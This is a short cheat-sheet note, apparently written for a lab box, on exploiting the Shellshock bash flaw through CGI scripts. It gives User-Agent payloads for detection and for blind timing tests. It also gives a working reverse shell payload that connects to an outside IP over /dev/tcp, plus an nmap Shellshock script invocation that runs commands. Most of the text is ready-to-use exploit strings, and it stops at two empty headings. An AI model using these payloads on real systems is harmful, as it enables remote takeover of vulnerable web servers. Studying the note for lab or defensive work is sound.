ShellShocked: if you have a cgi file(cgi is a directory where people put code to interfeace a website with some other service) with an old version of bash. Then possibly vulnerable. In the sample below we had a file called user.sh Checking if vuln: proxy with burp then change user agent to: test directly: () { :; };/bin/echo; echo *hello* //try without /bin/ also blind side test: () { :; }; sleep 10 //basically see if this makes the resonse 10 seconds slower than normaly ---may also have to try variations of this if server is confused--- blind side test: () { :;}; echo; sleep 10 blind side test: () { :;}; /bin/echo; sleep 10 Manual exploit: open up a nc listener. then put the string below in the user agent. () { :; }; echo; bash -i >& /dev/tcp/10.10.15.135/8081 0>&1 or try () { :; }; echo; /bin/bash -c ls Auto nse script:(tries several others like cookie, referal) # locate nse | grep shellshock #nmap -sV -p80 --script http-shelshock --script-args uri=/cgi-bin/user.sh, cmd=ls 10.10.10.56 //would be good to proxy this via burp and use cmd=ls 127.0.0.1 and -p8081 with a listener on local and forwarding to the site. Then look to find the shell shock request in history, send to repeater. sample of what it sends:

sample modification to try if its not working: